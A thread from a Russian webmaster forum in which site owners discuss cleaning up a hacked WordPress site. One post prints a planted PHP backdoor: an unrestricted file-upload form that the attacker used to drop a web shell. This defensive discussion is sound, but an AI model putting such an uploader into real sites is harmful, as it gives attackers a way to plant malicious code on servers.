Форум Сайтостроение Безопасность

Вирусы

1 23
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#21
psics:
вспомнил с Маши и медведя)

Я такое ..мм Г не смотрю (да, немного доводилось видеть.). И детям наверное не давал бы ;) А фраза, самая обычная.

psics:
Тоже дети?)))

У детей уже свои дети ;)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
psics
На сайте с 02.04.2009
Offline
130
psics
#22

В общем еще нашел прикол

код был в 404 ошибке - так видимо заливали шелл. Потом нашел 90 вирусняков - каспер - трояны - почистил. Натыкал этот хацкер вот такие хернюшки 

<?php

if(isset($_POST['Submit'])){

    $filedir = ""; 

    $maxfile = '2000000';



    $userfile_name = $_FILES['image']['name'];

    $userfile_tmp = $_FILES['image']['tmp_name'];

    if (isset($_FILES['image']['name'])) {

        $abod = $filedir.$userfile_name;

        @move_uploaded_file($userfile_tmp, $abod);

  

echo"<center><b>Done ==> $userfile_name</b></center>";

}

}

else{

echo'

<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

}



?>

В общем это временный файл залитый. Как можно его расшифровать? Код такого вида 

4300 0000

Из 16теричной системы перевести в обычную читабельную систему счисления?

Никто не может победить Апдейты 20-21 июля, 25-26 Редирект с гугла
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#23
psics:
Как можно его расшифровать?

А что его расшифровывать - он не зашифрован. Это форма, через которую заливают вирь под видом картинки.

Про 4300 0000 не понял.

psics
На сайте с 02.04.2009
Offline
130
psics
#24
SeVlad:
А что его расшифровывать - он не зашифрован. Это форма, через которую заливают вирь под видом картинки.

это мне понятно, обычная форма загрузки файла - шелл туда впихивал

SeVlad:
Про 4300 0000 не понял.

а вот это тот файл, который залит имеет вид если открыть блокнотом

4300 0000 2f76 6172 2f77 7777 2f6b 7568

6e69 6e61 7669 626f 722f 6461 7461 2f77

7777 2f6b 7568 6e69 2d6e 612d 7669 626f

вот хочу увидить этот код..

Вирусных на разных CMS Общая тема о борьбе ihor.ru: VDS с SSD
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#25
psics:
а вот это тот файл, который залит имеет вид если открыть блокнотом

Это точно текстовый файл? Или ты бинарник в блокноте открыл :)

Если текстовый, то наверняка должно быть что-то что с ним работает. Файл с формой - не оно. Но может это "что-то" через неё загружаться.

psics
На сайте с 02.04.2009
Offline
130
psics
#26

это даже не обязательно текстовый файл, может быть и рисунок.

Да я "бинарник" наверное, открыл блокнотом. И кстати нашел в шаблоне задвоенные рисунки - одинаковые. Но у одного размеры в 4 раза больше.

Мне сказали у меня параноя)

Спрашиваем и отвечаем по Что даёт такая ссылка? Программа для создания рисунков
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#27
psics:
И кстати нашел в шаблоне задвоенные рисунки - одинаковые. Но у одного размеры в 4 раза больше.

О! Вот это оно. В см - это вирь\шелл\дор. Открой его блокнотом и пролистай. Там может быть код, спрятанный среди другого текст. мусора. А может быть это просто виндовый вирь. Тогда виндовый антивирь (а также вирустотал не помешает)

---------- Добавлено 29.12.2014 в 13:31 ----------

psics:
И кстати нашел в шаблоне задвоенные рисунки - одинаковые

Эта.. а может просто с разными физ. размерами (в писелях в см)?

А то сразу- вирь-вирь :)

Вирус на сайте :( Взломали сайт. CTB Locker. Помогите разобраться с вирусом
psics
На сайте с 02.04.2009
Offline
130
psics
#28

да у меня мания)

там файлы разных размеров)

---------- Добавлено 29.12.2014 в 13:53 ----------

в общем. Переустановил вп, переустановил плагины. "Революционный слайдер" заменил. Почистил тему - то что увидел каспер. Надеюсь будет счастье в личной жизни

Проблемы со стримингом nginx+apache2 Спрашиваем и отвечаем по Спрашиваем и отвечаем по
1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий